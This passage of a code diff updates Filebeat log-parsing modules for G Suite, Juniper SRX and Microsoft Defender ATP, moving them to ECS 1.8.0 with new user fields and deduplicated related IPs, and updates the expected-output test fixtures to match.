"source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/groups/config/config.yml b/x-pack/filebeat/module/gsuite/groups/config/config.yml index c0034e6af7a2..754825184772 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/config.yml +++ b/x-pack/filebeat/module/gsuite/groups/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/groups/config/pipeline.js b/x-pack/filebeat/module/gsuite/groups/config/pipeline.js index 21f859a13e61..a0144435049f 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/groups/config/pipeline.js @@ -129,6 +129,17 @@ var groups = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var pipeline = new processor.Chain() diff --git a/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json index b99c77b57a57..2e43310ea93f 100644 --- a/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/groups/test/gsuite-groups-test.json.log-expected.json @@ -56,7 +56,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "accept_invitation", @@ -108,7 +111,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approve_join_request", @@ -162,7 +168,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "join", @@ -214,7 +228,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "request_to_join", @@ -266,7 +283,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_basic_setting", @@ -321,7 +341,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "create_group", @@ -372,7 +395,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "delete_group", @@ -423,7 +449,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_identity_setting", @@ -478,7 +507,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "add_info_setting", @@ -532,7 +564,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_info_setting", @@ -587,7 +622,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_info_setting", @@ -641,7 +679,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_new_members_restrictions_setting", @@ -696,7 +737,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_post_replies_setting", @@ -751,7 +795,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_spam_moderation_setting", @@ -806,7 +853,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_topic_setting", @@ -861,7 +911,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "moderate_message", @@ -916,7 +969,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "always_post_from_user", @@ -971,7 +1027,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "add_user", @@ -1026,7 +1090,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "ban_user_with_moderation", @@ -1081,7 +1153,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "revoke_invitation", @@ -1135,7 +1215,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "invite_user", @@ -1189,7 +1277,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "reject_join_request", @@ -1243,7 +1339,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "reinvite_user", @@ -1297,7 +1401,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "remove_user", @@ -1351,6 +1463,14 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/login/config/config.yml b/x-pack/filebeat/module/gsuite/login/config/config.yml index 41606ccb83c9..ab40715bd4ae 100644 --- a/x-pack/filebeat/module/gsuite/login/config/config.yml +++ b/x-pack/filebeat/module/gsuite/login/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 13c155661a0e..0fb518b351df 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -9,14 +9,17 @@ var login = (function () { evt.Put("event.category", ["authentication"]); switch (evt.Get("event.action")) { case "login_failure": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "failure"); break; case "login_success": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["start"]); evt.Put("event.outcome", "success"); break; case "logout": + evt.AppendTo("event.category", "session"); evt.Put("event.type", ["end"]); break; case "account_disabled_generic": @@ -83,9 +86,25 @@ var login = (function () { evt.Delete("json.events.parameters"); }; + var addTargetUser = function(evt) { + var affectedEmail = evt.Get("google_workspace.login.affected_email_address"); + if (affectedEmail) { + evt.Put("user.target.email", affectedEmail); + var data = affectedEmail.split("@"); + if (data.length !== 2) { + return; + } + + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.AppendTo("related.user", data[0]); + } + }; + var pipeline = new processor.Chain() .Add(categorizeEvent) .Add(processParams) + .Add(addTargetUser) .Build(); return { diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 287e6245a25e..261bf54dbf6c 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_generic", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_spamming_through_relay", @@ -144,7 +150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "account_disabled_spamming", @@ -193,7 +202,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "gov_attack_warning", @@ -240,12 +252,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -291,7 +307,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_challenge", @@ -341,7 +360,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_verification", @@ -392,12 +414,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "logout", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -440,12 +466,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.login", "event.id": "1", @@ -491,6 +521,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/saml/config/config.yml b/x-pack/filebeat/module/gsuite/saml/config/config.yml index e7d9992f0455..62f1e7d9f4e6 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/config.yml +++ b/x-pack/filebeat/module/gsuite/saml/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 3ad58062823d..2011e6d437b2 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js @@ -7,7 +7,7 @@ var saml = (function () { var categorizeEvent = function(evt) { evt.Put("event.type", ["start"]); - evt.Put("event.category", ["authentication"]); + evt.Put("event.category", ["authentication", "session"]); switch (evt.Get("event.action")) { case "login_failure": evt.Put("event.outcome", "failure"); diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 6dd2d0216b05..850766be83d3 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json @@ -2,7 +2,8 @@ { "event.action": "login_failure", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.saml", "event.id": "1", @@ -51,12 +52,16 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "login_success", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "gsuite.saml", "event.id": "1", @@ -103,6 +108,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml index 09cba1a7fd27..c6aa5ded1441 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json index 689aad5cde25..5943488f3241 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/user_accounts/test/gsuite-user_accounts-test.json.log-expected.json @@ -45,7 +45,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "2sv_enroll", @@ -93,7 +96,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "password_edit", @@ -141,7 +147,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_email_edit", @@ -189,7 +198,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_phone_edit", @@ -237,7 +249,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "recovery_secret_qa_edit", @@ -285,7 +300,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "titanium_enroll", @@ -333,7 +351,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "titanium_unenroll", @@ -381,6 +402,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml index e433632b7a89..ac21107959cb 100644 --- a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml +++ b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/imperva/securesphere/config/input.yml b/x-pack/filebeat/module/imperva/securesphere/config/input.yml index d7c7e0ba749a..51f37f33c882 100644 --- a/x-pack/filebeat/module/imperva/securesphere/config/input.yml +++ b/x-pack/filebeat/module/imperva/securesphere/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/infoblox/nios/config/input.yml b/x-pack/filebeat/module/infoblox/nios/config/input.yml index 48403d0a09c1..6f404d2ce465 100644 --- a/x-pack/filebeat/module/infoblox/nios/config/input.yml +++ b/x-pack/filebeat/module/infoblox/nios/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/iptables/log/config/input.yml b/x-pack/filebeat/module/iptables/log/config/input.yml index b247428d1381..5226893b62c9 100644 --- a/x-pack/filebeat/module/iptables/log/config/input.yml +++ b/x-pack/filebeat/module/iptables/log/config/input.yml @@ -55,4 +55,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/junos/config/input.yml b/x-pack/filebeat/module/juniper/junos/config/input.yml index 088629b28ba2..6c3777a8325c 100644 --- a/x-pack/filebeat/module/juniper/junos/config/input.yml +++ b/x-pack/filebeat/module/juniper/junos/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/netscreen/config/input.yml b/x-pack/filebeat/module/juniper/netscreen/config/input.yml index 0ec5bf4cda1e..8316e26b292a 100644 --- a/x-pack/filebeat/module/juniper/netscreen/config/input.yml +++ b/x-pack/filebeat/module/juniper/netscreen/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/srx/config/srx.yml b/x-pack/filebeat/module/juniper/srx/config/srx.yml index 6af16945317c..021eca1c9645 100644 --- a/x-pack/filebeat/module/juniper/srx/config/srx.yml +++ b/x-pack/filebeat/module/juniper/srx/config/srx.yml @@ -28,4 +28,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml b/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml index 9fb9057b8fa8..a7d4b22ee7ed 100644 --- a/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml +++ b/x-pack/filebeat/module/juniper/srx/ingest/pipeline.yml @@ -238,37 +238,57 @@ processors: field: related.ip value: '{{source.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.destination?.ip != null' field: related.ip value: '{{destination.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.source?.nat?.ip != null' field: related.ip value: '{{source.nat.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx?.destination?.nat?.ip != null' field: related.ip value: '{{destination.nat.ip}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.url?.domain != null' field: related.hosts value: '{{url.domain}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.source?.domain != null' field: related.hosts value: '{{source.domain}}' ignore_failure: true + allow_duplicates: false - append: if: 'ctx.destination?.domain != null' field: related.hosts value: '{{destination.domain}}' ignore_failure: true + allow_duplicates: false + +- append: + if: 'ctx?.source?.user?.name != null' + field: related.user + value: '{{source.user.name}}' + ignore_failure: true + allow_duplicates: false +- append: + if: 'ctx?.destination?.user?.name != null' + field: related.user + value: '{{destination.user.name}}' + ignore_failure: true + allow_duplicates: false on_failure: - set: diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json index 69639938252b..9227f428e4a1 100644 --- a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json @@ -58,6 +58,9 @@ "10.10.10.1", "187.19.188.200" ], + "related.user": [ + "user1" + ], "server.ip": "187.19.188.200", "server.port": 80, "service.type": "juniper", @@ -110,6 +113,9 @@ "related.ip": [ "192.0.2.0" ], + "related.user": [ + "admin" + ], "service.type": "juniper", "source.domain": "host.example.com", "source.ip": "192.0.2.0", diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json index 9eb70c83a645..622200c634ae 100644 --- a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json @@ -44,8 +44,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "10.0.0.1", - "10.128.0.1", "10.0.0.1", "10.128.0.1" ], @@ -245,8 +243,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "1.2.3.4", - "5.6.7.8", "1.2.3.4", "5.6.7.8" ], @@ -323,8 +319,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "50.0.0.100", - "30.0.0.100", "50.0.0.100", "30.0.0.100" ], @@ -396,7 +390,6 @@ "related.ip": [ "192.0.2.1", "198.51.100.12", - "192.0.2.1", "18.51.100.12" ], "rule.name": "policy1", @@ -472,7 +465,6 @@ "related.ip": [ "192.0.2.1", "198.51.100.12", - "192.0.2.1", "18.51.100.12" ], "rule.name": "policy1", @@ -563,8 +555,7 @@ "related.ip": [ "10.3.255.203", "8.23.224.110", - "10.3.136.49", - "8.23.224.110" + "10.3.136.49" ], "rule.name": "permit_all", "server.bytes": 535, @@ -636,8 +627,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "192.168.2.164", - "172.16.1.19", "192.168.2.164", "172.16.1.19" ], @@ -722,8 +711,7 @@ "related.ip": [ "100.73.10.92", "58.68.126.198", - "58.78.140.131", - "58.68.126.198" + "58.78.140.131" ], "rule.name": "NAT", "server.bytes": 136, @@ -816,8 +804,7 @@ "related.ip": [ "192.168.255.2", "8.8.8.8", - "192.168.0.47", - "8.8.8.8" + "192.168.0.47" ], "rule.name": "trust-to-untrust-001", "server.bytes": 116, @@ -966,8 +953,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.ip": "207.17.137.56", @@ -1053,8 +1039,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.bytes": 0, @@ -1146,8 +1131,7 @@ "related.ip": [ "192.168.224.30", "207.17.137.56", - "173.167.224.7", - "207.17.137.56" + "173.167.224.7" ], "rule.name": "General-Outbound", "server.bytes": 104, @@ -1240,11 +1224,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 686432, "server.ip": "5.0.0.1", @@ -1328,11 +1313,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.ip": "5.0.0.1", "server.nat.port": 80, @@ -1417,11 +1403,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 646, "server.ip": "5.0.0.1", @@ -1495,8 +1482,6 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "50.0.0.100", - "30.0.0.100", "50.0.0.100", "30.0.0.100" ], @@ -1637,11 +1622,12 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1", "4.0.0.1", "5.0.0.1" ], + "related.user": [ + "user1" + ], "rule.name": "permit-all", "server.bytes": 646, "server.ip": "5.0.0.1", @@ -1733,8 +1719,7 @@ "related.ip": [ "10.1.1.100", "46.165.154.241", - "172.19.34.100", - "46.165.154.241" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 2132, @@ -1829,8 +1814,7 @@ "related.ip": [ "10.1.1.100", "91.228.167.172", - "172.19.34.100", - "91.228.167.172" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 9670, @@ -1906,8 +1890,7 @@ "related.ip": [ "10.1.1.100", "8.8.8.8", - "172.19.34.100", - "8.8.8.8" + "172.19.34.100" ], "rule.name": "default-permit", "server.ip": "8.8.8.8", @@ -1989,8 +1972,7 @@ "related.ip": [ "10.1.1.100", "8.8.8.8", - "172.19.34.100", - "8.8.8.8" + "172.19.34.100" ], "rule.name": "default-permit", "server.bytes": 82, diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json index 8a5a73073558..71faf19efc7b 100644 --- a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json @@ -67,6 +67,9 @@ "0.0.0.0", "3.3.10.11" ], + "related.user": [ + "unknown-user" + ], "rule.id": "3", "rule.name": "IPS", "server.bytes": 0, @@ -155,6 +158,9 @@ "0.0.0.0", "3.3.10.11" ], + "related.user": [ + "unknown-user" + ], "rule.id": "3", "rule.name": "IPS", "server.bytes": 0, diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json index 6b0aa31072fa..1da203ed4510 100644 --- a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json +++ b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json @@ -49,6 +49,9 @@ "192.168.1.100", "103.235.46.39" ], + "related.user": [ + "user01" + ], "server.ip": "103.235.46.39", "server.port": 80, "service.type": "juniper", @@ -108,6 +111,9 @@ "10.10.10.50", "216.200.241.66" ], + "related.user": [ + "user02" + ], "server.ip": "216.200.241.66", "server.port": 80, "service.type": "juniper", @@ -320,6 +326,9 @@ "related.ip": [ "10.10.10.1" ], + "related.user": [ + "user01" + ], "service.type": "juniper", "source.ip": "10.10.10.1", "source.user.name": "user01", @@ -372,6 +381,9 @@ "192.0.2.3", "198.51.100.2" ], + "related.user": [ + "user01@testuser.com" + ], "server.ip": "198.51.100.2", "server.port": 80, "service.type": "juniper", @@ -433,6 +445,9 @@ "192.168.1.100", "103.235.46.39" ], + "related.user": [ + "user01" + ], "server.ip": "103.235.46.39", "server.port": 80, "service.type": "juniper", diff --git a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml index 9b9eda7e0942..d1e5c971b802 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml @@ -54,4 +54,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml b/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml index 0f35c753092f..b04d4b5d67fc 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/ingest/pipeline.yml @@ -249,17 +249,34 @@ processors: ###################### - rename: field: json.relatedUser.userName - target_field: host.user.name + target_field: user.name ignore_missing: true - rename: field: json.relatedUser.domainName - target_field: host.user.domain + target_field: user.domain ignore_missing: true - rename: field: json.evidence.userSid - target_field: host.user.id + target_field: user.id ignore_missing: true +############################## +## ECS host.user Mapping ## +## Deprecated since ECS 1.8 ## +############################## +- set: + field: host.user.name + value: '{{user.name}}' + ignore_empty_value: true +- set: + field: host.user.domain + value: '{{user.domain}}' + ignore_empty_value: true +- set: + field: host.user.id + value: '{{user.id}}' + ignore_empty_value: true + ######################### ## ECS Related Mapping ## ######################### @@ -269,8 +286,8 @@ processors: if: ctx.json?.evidence?.ipAddress != null - append: field: related.user - value: '{{host.user.name}}' - if: ctx.host?.user?.name != null + value: '{{user.name}}' + if: ctx.user?.name != null - append: field: related.hash value: '{{file.hash.sha1}}' diff --git a/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json b/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json index 0423289d6ace..388aa8586a1c 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json +++ b/x-pack/filebeat/module/microsoft/defender_atp/test/defender_atp-test.json.log-expected.json @@ -118,7 +118,9 @@ "forwarded" ], "threat.framework": "MITRE ATT&CK", - "threat.technique.name": "DefenseEvasion" + 